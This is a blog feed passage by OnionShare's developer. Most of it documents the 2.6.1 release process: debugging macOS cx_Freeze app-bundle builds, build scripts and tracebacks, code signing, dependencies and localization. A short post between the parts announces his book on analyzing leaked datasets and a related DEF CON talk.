/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6
/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/lib
Loaded libraries:
@rpath/libshiboken6.abi3.6.5.dylib -> None
@rpath/QtCore.framework/Versions/A/QtCore -> /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/lib/QtCore.framework/Versions/A/QtCore
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
/System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration -> /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration
/usr/lib/libc++.1.dylib -> /usr/lib/libc++.1.dylib
/usr/lib/libSystem.B.dylib -> /usr/lib/libSystem.B.dylib
error: [Errno 2] No such file or directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/libpyside6.abi3.6.5.dylib'
</code></pre>
<p>Ok, another error message. This time it's complaining that a library in the app bundle, <code>OnionShare.app/Contents/MacOS/libpyside6.abi3.6.5.dylib</code>, doesn't exist. I checked to see if that file exists anywhere in the app bundle, and it does in three different places in fact:</p>
<pre><code>% find build/OnionShare.app | grep libpyside6.abi3.6.5.dylib
build/OnionShare.app/Contents/Resources/lib/PySide6/libpyside6.abi3.6.5.dylib
build/OnionShare.app/Contents/Resources/lib/libpyside6.abi3.6.5.dylib
build/OnionShare.app/Contents/Resources/libpyside6.abi3.6.5.dylib
</code></pre>
<p>🎵 Debugging noises... 🎵</p>
<p>Ok I have a lead. The <code>setup-freeze.py</code> file is a <a href="https://cx-freeze.readthedocs.io/en/stable/setup_script.html">cx_Freeze setup script</a>, and looking in it I have various platform-specific modifications depending on which platform I'm trying to freeze:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="n">platform</span><span class="o">.</span><span class="n">system</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"Windows"</span><span class="p">:</span>
<span class="n">include_msvcr</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">gui_base</span> <span class="o">=</span> <span class="s2">"Win32GUI"</span>
<span class="c1"># gui_base = None</span>
<span class="n">exec_icon</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="s2">"onionshare"</span><span class="p">,</span> <span class="s2">"resources"</span><span class="p">,</span> <span class="s2">"onionshare.ico"</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">platform</span><span class="o">.</span><span class="n">system</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"Darwin"</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">PySide6</span>
<span class="kn">import</span> <span class="nn">shiboken6</span>
<span class="n">include_msvcr</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">gui_base</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">exec_icon</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">include_files</span> <span class="o">+=</span> <span class="p">[</span>
<span class="p">(</span>
<span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">PySide6</span><span class="o">.</span><span class="n">__path__</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">"libpyside6.abi3.6.5.dylib"</span><span class="p">),</span>
<span class="s2">"libpyside6.abi3.6.5.dylib"</span><span class="p">,</span>
<span class="p">),</span>
<span class="p">(</span>
<span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">shiboken6</span><span class="o">.</span><span class="n">__path__</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">"libshiboken6.abi3.6.5.dylib"</span><span class="p">),</span>
<span class="s2">"libshiboken6.abi3.6.5.dylib"</span><span class="p">,</span>
<span class="p">),</span>
<span class="p">]</span>
</pre></div>
<p>When <code>platform.system() == "Darwin"</code> (e.g. when this script is being run on macOS), it adds some extra files to be included. I can't remember why I originally added this hack (probably it was required to get the build to succeed) but I'm going to try just deleting it and see if that helps. I've updated the macOS specific code to just be:</p>
<div class="hll"><pre><span></span><span class="k">elif</span> <span class="n">platform</span><span class="o">.</span><span class="n">system</span><span class="p">()</span> <span class="o">==</span> <span class="s2">"Darwin"</span><span class="p">:</span>
<span class="n">include_msvcr</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">gui_base</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">exec_icon</span> <span class="o">=</span> <span class="kc">None</span>
</pre></div>
<p>And then I'm running the <code>bdist_mac</code> command again... and it finished without an errors!</p>
<p>Now I'll run the last command:</p>
<pre><code>% poetry run python ./scripts/build-macos.py cleanup-build
> Delete unused Qt Frameworks
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtMultimediaQuick.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickControls2.framework
--snip--
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtWebEngineQuick.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtWebEngineQuickDelegatesQml.framework
> Move files around so Apple will notarize
Traceback (most recent call last):
File "/Users/user/code/onionshare/desktop/./scripts/build-macos.py", line 364, in <module>
main()
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1157, in __call__
return self.main(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1078, in main
rv = self.invoke(ctx)
^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1688, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1434, in invoke
return ctx.invoke(self.callback, **ctx.params)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 783, in invoke
return __callback(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/code/onionshare/desktop/./scripts/build-macos.py", line 186, in cleanup_build
os.rename(
IsADirectoryError: [Errno 21] Is a directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib' -> '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib'
</code></pre>
<p>The <code>build-macos.py cleanup-build</code> script does a few things:</p>
<ul>
<li>Deletes unused Qt frameworks to save space. This seems to finish successfully.</li>
<li>Moves files around because this was necessary to notarize the app bundle (part of the final code signing step).</li>
<li>Deletes more unusued PySide6 files to save even more space.</li>
</ul>
<p>Here's the beginning of the moving-files-around part of the code:</p>
<div class="hll"><pre><span></span><span class="nb">print</span><span class="p">(</span><span class="s2">"> Move files around so Apple will notarize"</span><span class="p">)</span>
<span class="c1"># https://github.com/marcelotduarte/cx_Freeze/issues/594</span>
<span class="c1"># https://gist.github.com/TechnicalPirate/259a9c24878fcad948452cb148af2a2c#file-custom_bdist_mac-py-L415</span>
<span class="c1"># Move lib from MacOS into Resources</span>
<span class="n">os</span><span class="o">.</span><span class="n">rename</span><span class="p">(</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS/lib"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib"</span><span class="p">,</span>
<span class="p">)</span>
<span class="n">run</span><span class="p">(</span>
<span class="p">[</span><span class="s2">"ln"</span><span class="p">,</span> <span class="s2">"-s"</span><span class="p">,</span> <span class="s2">"../Resources/lib"</span><span class="p">],</span>
<span class="n">cwd</span><span class="o">=</span><span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS"</span><span class="p">,</span>
<span class="p">)</span>
</pre></div>
<p>The <a href="https://github.com/marcelotduarte/cx_Freeze/issues/594">cx_Freeze bug</a> that was referenced was just closed 3 weeks ago! So probably this moving files around stuff is no longer necessary. I'll try just ripping it all out and see what happens... First I ran the <code>bdist_mac</code> command again to make a fresh version of the app bundle, and then I ran the cleanup script again, this time without the code to move files around:</p>
<pre><code>% poetry run python ./scripts/build-macos.py cleanup-build
> Delete unused Qt Frameworks
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtMultimediaQuick.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickControls2.framework
--snip--
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtWebEngineQuick.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtWebEngineQuickDelegatesQml.framework
> Delete more unused PySide6 stuff to save space
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Designer.app
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/examples
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/glue
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/include
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/lupdate
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/libpyside6.abi3.6.4.dylib
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Qt/qml
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/shiboken6/libshiboken6.abi3.6.4.dylib
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Assistant.app
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Linguist.app
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/libpyside6qml.abi3.6.4.dylib
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/lrelease
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/qmlformat
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/qmllint
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/qmlls
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtBluetooth
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtConcurrent
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtDesigner
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtNetworkAuth
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtNfc
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtOpenGL
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtOpenGLWidgets
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtPositioning
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtQuick3D
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtQuick3DRuntimeRender
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtQuick3DUtils
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtShaderTools
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtStateMachine
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtSvgWidgets
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtWebChannel
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtWebEngineCore
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtWebEngineQuick
Cannot delete, filename not found: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/QtXml
> Freed 847 mb
</code></pre>
<p>Nice, it succeeded this time! However, I'm using a newer version of PySide6 that I was in the last release, and it seems that many of the files it's trying to delete don't exist anymore. So I edited the <code>build-macos.py</code> script to remove the code that was giving errors.</p>
<p>I should more thoroughly check to see if there are other files I can delete from the app bundle too. But first, I'll try running the app bundle:</p>
<pre><code>% ./build/OnionShare.app/Contents/MacOS/onionshare -v
zsh: segmentation fault ./build/OnionShare.app/Contents/MacOS/onionshare -v
</code></pre>
<p><img src="macos-onionshare-crash.png" alt="OnionShare crashing in macOS"></p>
<p>And it crashes... Okay, let's try again. I rebuilt the app bundle, but this time didn't run the cleanup script. Can I run the app bundle now without it crashing? ...nope. It crashes even before running the cleanup script.</p>
<p>I pushed the changes that I've made so far to the <code>release-2.6.1</code> branch and the <code>build-mac-intel</code> job actually finished and created a binary in GitHub Actions, though I wouldn't be surprised if the binary it made crashes just like this one.</p>
<p>I'm going to need to spend some more time fixing this, but for now I think it's time to take a break.</p>
<h2 id="time-to-take-a-break">Time to take a break</h2><p>I've made a lot more solid progress, but this post is getting long. Here's what I want to make sure to get done next time:</p>
<ul>
<li>Finish making the macOS app bundle work on my old Mac, and make sure the GitHub Actions workflow creates a working Mac app bundle too.</li>
<li>Create a working macOS app bundle on my Apple Silicon Mac too.</li>
<li>Update the version of Python in the GitHub Actions workflow to 3.11.5--I realized I haven't done that yet.</li>
<li>Once I think everything is ready, do a final test of the binaries created by GitHub Actions, including the Snapcraft and Flatpak packages.</li>
<li>Get the other OnionShare devs to review my pull request and merge it into <code>main</code>.</li>
<li>Create the PGP-signed git tag for <code>v2.6.1</code>.</li>
<li>Final packaging and code signing for the Windows release, using the new HARICA smart card that I've never used before.</li>
<li>Final packaging and code signing for the macOS releases, both Intel and the new Apple Silicon version.</li>
<li>Publish the release, which includes:<ul>
<li>Gather all the binaries for the different platform and create detached PGP signatures for them all.</li>
<li>Create a new release on GitHub and upload all of the binaries and their PGP sigs.</li>
<li>Publish the release to PyPI, so people can install the CLI app that way.</li>
<li>Update the app in Homebrew, and also figure out how this is going to work with separate Intel and Apple Silicon versions.</li>
<li>Update the onionshare.org website, including uploading all of the binaries and sigs to <a href="https://onionshare.org/dist/">https://onionshare.org/dist/</a>, updating the documentation website, and updating <a href="https://onionshare.org/latest-version.txt">https://onionshare.org/latest-version.txt</a>, which the Windows and macOS versions use to detect the latest version and prompt for updates.</li>
</ul>
</li>
</ul>
<p>That feels like more than enough to save for a future blog post.</p>
Hacks, Leaks, and Revelations: Pandemic Profiteers and COVID-19 Disinformation2023-09-26T00:00:00ZMicah Leeurn:uuid:157edddb-e626-3076-99b9-67c8cd7d4d41<p>I've spent the last two years writing <a href="https://hacksandleaks.com/"><em>Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</em></a>, a book that teaches journalists, researchers, and hacktivists how to report on leaked datasets! Datasets like these get dumped online literally every day (much of it published by <a href="https://ddosecrets.com/">DDoSecrets</a>), but few people have the technical skills to download it and uncover its secrets. I'm hoping to change that.</p>
<p>In August, I gave a talk at the DEF CON 31 Misinformation Village about one of the case studies from my book called <strong>Pandemic Profiteers and COVID-19 Disinformation</strong>, where I explain in detail how I analyzed hacked data from the anti-vax group America's Frontline Doctors ("the horse paste peddlers" that were "hilariously easy to hack," according to my source). They raked in millions of dollars selling ivermectin and hydroxychloroquine, all while telling their supporters that COVID-19 vaccines are deadly and convincing them that things like wearing masks during a pandemic was a violation of their rights. My reporting led to a Congressional investigation into them.</p>
<p>Watch my DEF CON talk here:</p>
<div class="responsive-iframe-container">
<iframe src="https://www.youtube-nocookie.com/embed/rXqO6J4zIsk?si=DZxuojNIdor6xAJi&cc_load_policy=1" title="YouTube video player" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
</div><p><em>Hacks, Leaks, and Revelations</em> is a technical book, but it doesn't expect any prior experience. All you need to get started is a computer running Windows, macOS, or Linux, an internet connection, some free disk space to download datasets to work with, and a willingness to learn and explore. I walk you through everything you need in the exercises.</p>
<p>It will be released on January 9, 2024, though if you order it <a href="https://nostarch.com/hacks-leaks-and-revelations">directly from the publisher</a>, No Starch Press, they'll start shipping copies in November.</p>
<p><em>The feature image for this blog post, a photo of me and Cory Doctorow signing books at the No Starch Press table at DEF CON 31, was taken by Bill Pollock.</em></p>
What goes into making an OnionShare release: Part 12023-09-11T00:00:00ZMicah Leeurn:uuid:e03ce594-a16f-3625-a478-1ecf6e0e0bed<p>In the nine years (!) that I've been working on <a href="https://onionshare.org/">OnionShare</a>, a growing community of contributors have taken on more and more of the work, but I'm still the only one who has actually made any releases. I'm hoping to change that. Even though OnionShare is established open source software, making a release is an extremely cumbersome process. This blog post (and the ones after) documents all the work I'm doing to make the OnionShare 2.6.1 release. This way others who will take over making releases in the future (and anyone interested in releasing open source desktop software) can see what goes into it.</p>
<p>As you'll soon see, it's <em>bonkers</em> how much work it can be. Though to be fair, this release is <em>especially bad</em>. In the course of making it, I've ended up creating a <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">pull request</a> and opening an <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371">issue</a> on an upstream project, <a href="https://github.com/flatpak/flatpak-builder-tools">flatpak-builder-tools</a>. I would love to find secure ways to streamline and automate more of it.</p>
<p>This blog post is <em>stupidly long</em> (and it's only part 1!), so here's a table of contents:</p>
<ul>
<li><a href="#background-on-onionshare-desktop-releases">Background on OnionShare desktop releases</a></li>
<li><a href="#preparing-the-release">Preparing the release</a></li>
<li><a href="#updating-the-release-instructions">Updating the release instructions</a></li>
<li><a href="#updating-the-change-log">Updating the change log</a></li>
<li><a href="#ensuring-the-documentation-is-up-to-date">Ensuring the documentation is up-to-date</a></li>
<li><a href="#ensuring-the-localization-is-up-to-date">Ensuring the localization is up-to-date</a><ul>
<li><a href="#updating-the-onionshare-desktop-strings">Updating the OnionShare desktop strings</a></li>
<li><a href="#checking-for-languages-with-that-are-at-least-90-translated">Checking for languages with that are at least 90% translated</a></li>
<li><a href="#enabling-languages-in-the-onionshare-app">Enabling languages in the OnionShare app</a></li>
<li><a href="#enabling-languages-in-the-documentation">Enabling languages in the documentation</a></li>
</ul>
</li>
<li><a href="#making-sure-snapcraft-packaging-works">Making sure Snapcraft packaging works</a><ul>
<li><a href="#updating-dependencies">Updating dependencies</a></li>
<li><a href="#trying-to-update-from-pyside2-to-pyside6">Trying to update from PySide2 to PySide6</a></li>
<li><a href="#updating-from-core20-to-core22">Updating from <code>core20</code> to <code>core22</code></a></li>
</ul>
</li>
<li><a href="#making-sure-the-flatpak-packaging-works">Making sure the Flatpak packaging works</a><ul>
<li><a href="#updating-pyside6">Updating <code>pyside6</code></a></li>
<li><a href="#updating-tor">Updating <code>tor</code></a></li>
<li><a href="#trying-to-update-obfs4proxy-meek-client-and-snowflake-client">Trying to update <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code></a></li>
</ul>
</li>
<li><a href="#debugging-flatpak-builder-tools">Debugging flatpak-builder-tools</a><ul>
<li><a href="#trying-to-update-python-dependencies">Trying to update Python dependencies</a></li>
<li><a href="#another-flatpak-builder-tools-rabbit-hole">Another flatpak-builder-tools rabbit hole</a></li>
<li><a href="#adding-poetry-to-requirements-txt-script">Adding Poetry to <code>requirements.txt</code> script</a></li>
<li><a href="#testing-flatpak">Testing Flatpak</a></li>
<li><a href="#fixing-flatpak-go-deps-py-script">Fixing <code>flatpak-go-deps.py</code> script</a></li>
<li><a href="#giving-up-on-go-dependencies-and-finishing-flatpak-packaging">Giving up on Go dependencies, and finishing Flatpak packaging</a></li>
</ul>
</li>
<li><a href="#pushing-back-the-release-date">Pushing back the release date</a></li>
</ul>
<h2 id="background-on-onionshare-desktop-releases">Background on OnionShare desktop releases</h2><p>Each release involves publishing binaries for Windows, macOS, and Linux:</p>
<ul>
<li>The Windows version for OnionShare 2.6.1 will be 64-bit. All previous Windows versions have been 32-bit, but after upgrading to PySide6, which doesn't support 32-bit Windows, we've decided to abandon support for 32-bit Windows.</li>
<li>The macOS version will be for both Intel and Apple Silicon. This will be the first release that supports Apple Silicon Macs--in a future release, we might make a single universal2 binary, but for now they will be separate.</li>
<li>For Linux, rather than supporting a myriad of different distros, we're just making releases for Snapcraft and Flatpak, which can be installed in any distro. While Snapcraft and Flatpak packaging can be extremely challenging (as you'll see below), there's a whole different set of challenges of supporting every version of Ubuntu, Debian, Fedora, Arch, and so--especially when you rely on dependencies that aren't packaged in these OSes, or that are only packaged in newer versions (e.g. Ubuntu 23.04) but not older versions (e.g. Ubuntu 20.04).</li>
</ul>
<p>This blog post is just releases for the desktop version of OnionShare--the <a href="https://apps.apple.com/us/app/onionshare/id1601890129">iPhone</a> and <a href="https://play.google.com/store/apps/details?id=org.onionshare.android&pli=1">Android</a> versions have their own separate processes and release schedules.</p>
<p>Another complication is code signing:</p>
<ul>
<li>The Windows <code>.exe</code> files, and the <code>.msi</code> installer, must be digitally signed with a code signing certificate from a trusted Certificate Authority. In previous versions of OnionShare, I've used the Polish CA <a href="https://www.certum.eu/en/code-signing-certificates/">Certum</a> to get my code signing certificate, since it was inexpensive for open source projects. For this release, we're switching to <a href="https://harica.gr/">HARICA</a>, a CA run by Greek universities. The code signing keys for both Certum and HARICA are stored on physical USB smart cards.</li>
<li>The macOS app bundle (<code>.app</code> folders) must be code signed using a valid Apple Developer key. I'll be using my same personal Apple Developer account that I've signed previous OnionShare releases with.</li>
<li>All of the source and binary packages published to <a href="https://onionshare.org/dist/">https://onionshare.org/dist/</a> are also code signed using a PGP key. I've been using my own personal PGP key to sign these, and I will continue to do that for this release. In the future, we might create a new OnionShare PGP signing key that can be shared amongst the people making the releases. Also, I use my PGP key to sign the git tag for the release.</li>
</ul>
<p>Recently, the new nonprofit <a href="https://scidsg.org/">Science & Design</a>, founded by Glenn Sorrentino (who designed the beautiful OnionShare UX!), has taken on the role of fiscal sponsor for OnionShare. They're applying for grants and now we have a little bit of funding to actually pay OnionShare developers to keep the project alive and vibrant. The new HARICA Windows code signing key is in Science & Design's name.</p>
<p>OnionShare is complicated software with a lot of dependencies, all of which must be included in each package. The dependencies include:</p>
<ul>
<li>PySide6, which is Python support for the Qt GUI library. OnionShare 2.6 used PySide2, but in this version we've upgraded it to PySide6. In the past (when OnionShare used PyQt5) I've had to build Qt 5 from source, but the process for PySide is simpler, as pre-built binaries can be installed from PyPI.</li>
<li><code>tor</code> and <code>libevent</code>, which is a dependency of <code>tor</code>. The Windows and Mac versions download Tor Browser and extract the binaries. The Snapcraft and Flatpak versions build these from source. They're pretty simple to build from source.</li>
<li><code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code>. These are Tor pluggable transports, required for bypassing censorship when the connection to Tor is blocked. These are all implemented in Go, and they get built from source. This isn't too bad in Windows, macOS, or Snapcraft, but as you'll see, it can be a nightmare in Flatpak.</li>
<li>All of the Python dependencies for both the CLI and desktop version, which are managed by Poetry but all get packaged in different ways depending on the platform.</li>
</ul>
<p>The process of making a release is, basically, to set up a development environment and run the appropriate build scripts on each platform. Since there are several different platforms, in the past I've mostly done this using VMs. However, we've started automating this using a GitHub Actions <a href="https://github.com/onionshare/onionshare/blob/d758448ac2896d0a434ab63a3b70bfee0b5e6c69/.github/workflows/build.yml">workflow</a> that builds binaries various platforms. This way I can download those binaries, make sure they work, and code sign them offline.</p>
<p>I have a dedicated older MacBook (with an Intel processor) that I use for making macOS releases. This is the only computer that has copies of my Apple Developer signing keys. I plan on setting up a new Windows 11 VM to make this Windows release--for code signing, I'll use USB passthrough so I can use the smart card with my code signing key in the VM. I also have a newer MacBook Pro with an Apple Silicon processor that I'll need to use (at least somewhat) to make the Apple Silicon release, and an x86-64 computer running Ubuntu, which I can use for making the Snapcraft and Flatpak releases.</p>
<p>OnionShare is not only cross-platform, it's also multilingual. A major task each time I make a release is localization: making sure that all of the languages OnionShare has been translated into it make it into this release, and doing the same for the documentation.</p>
<p>The release process is already meticulously documented in the <a href="https://github.com/onionshare/onionshare/blob/main/RELEASE.md"><code>RELEASE.md</code></a> file in the git repo--these are the steps that I follow myself each time I make a release. But also, I always end up tweaking and updating this file with each release, and I'm sure I'll do with this release.</p>
<h2 id="preparing-the-release">Preparing the release</h2><p>At the top of <a href="https://github.com/onionshare/onionshare/blob/d758448ac2896d0a434ab63a3b70bfee0b5e6c69/RELEASE.md"><code>RELEASE.md</code></a> (this links to the version of this file when I started the release process) I've documented several steps to take to prepare the release, including:</p>
<ul>
<li>Updating the version string in several files (<code>cli/pyproject.toml</code>, <code>cli/onionshare_cli/resources/version.txt</code>, <code>desktop/pyproject.toml</code>, and others), and update the <code>CHANGELOG.md</code> file</li>
<li>Ensuring the documentation is up-to-date</li>
<li>Ensuring the localization is up-to-date (OnionShare and its documentation is translated into several languages using <a href="https://hosted.weblate.org/projects/onionshare/">Weblate</a>--when people submit new translations, Weblate creates git commits that must be merged into the project)</li>
<li>Make sure the Snapcraft packaging works</li>
<li>Make sure the Flatpak packaging works</li>
</ul>
<p>I'm going to have to make some code changes, so I'm starting by creating a new git branch specifically for this release:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>branch<span class="w"> </span>release-2.6.1
git<span class="w"> </span>checkout<span class="w"> </span>release-2.6.1
</pre></div>
<p>Here's my pull request for this release: <a href="https://github.com/onionshare/onionshare/pull/1749">https://github.com/onionshare/onionshare/pull/1749</a></p>
<p>Next, I'm going through each of the files listed to update the version string to 2.6.1, though in this case I had actually already done this. (I had started making this release months earlier, but then got incredibly busy and never finished.)</p>
<h2 id="updating-the-release-instructions">Updating the release instructions</h2><p><code>RELEASE.md</code> is really a living document. I tend to make changes every time I make a release. As I'm writing this blog post, I noticed that <code>RELEASE.md</code> includes instructions to update to the latest version of Tor, but it doesn't include instructions on updating all of the Python dependencies, which is something I do with each release. So, I'm modifying it.</p>
<p>I'm adding instructions that basically say to change to the <code>cli</code>, <code>desktop</code>, and <code>docs</code> folders and run <code>poetry update</code>. The <code>cli</code> folder has the code for the command line version of OnionShare, the <code>desktop</code> folder has the code for the desktop version, and the <code>docs</code> folder has the code for the documentation website hosted at <a href="https://docs.onionshare.org/">https://docs.onionshare.org/</a>. Each of these is a separate Python project with dependencies managed by <a href="https://python-poetry.org/">Poetry</a>.</p>
<p>I updated these Python dependencies and made a commit.</p>
<p><code>RELEASE.md</code> already had a section about updating Tor and also the Tor pluggable transports (tools to bypasses censorship in cases where Tor is blocked) that are built-in to OnionShare, <a href="https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/meek">meek</a>, <a href="https://gitlab.com/yawning/obfs4">obfs4proxy</a>, and <a href="https://snowflake.torproject.org/">snowflake</a>. Starting with this release, we no longer need to manually update the version of Tor anymore--the <code>desktop/scripts/get-tor.py</code> script, which downloads Tor Browser and extracts the Tor binary from it, had <a href="https://github.com/onionshare/onionshare/commit/d970cf1148d85d1ce570e0176b97a77da11af1ff">recently</a> been updated to always download the latest version.</p>
<p>On my Mac, I ran the <code>script/get-tor.py</code> script, to download the macOS version of Tor Browser, and to extract the <code>tor</code> and <code>libevent</code> binaries:</p>
<pre><code>$ cd desktop
$ poetry run python scripts/get-tor.py macos
Imported Tor GPG key: ['EF6E286DDA85EA2A4BA7DE684E2C6E8793298290']
Downloading https://dist.torproject.org/torbrowser/12.5.3/TorBrowser-12.5.3-macos_ALL.dmg
Downloading https://dist.torproject.org/torbrowser/12.5.3/TorBrowser-12.5.3-macos_ALL.dmg.asc
Tor Browser verification successful!
Checksumming whole disk (unknown partition : 0)…
..................................................................................................................................................................................
whole disk (unknown partition : 0): verified CRC32 $30C00646
verified CRC32 $8925F2DE
/dev/disk4 /Volumes/Tor Browser
Traceback (most recent call last):
File "/Users/user/code/onionshare/desktop/scripts/get-tor.py", line 343, in <module>
main()
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1157, in __call__
return self.main(*args, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/click/core.py", line 1078, in main
rv = self.invoke(ctx)
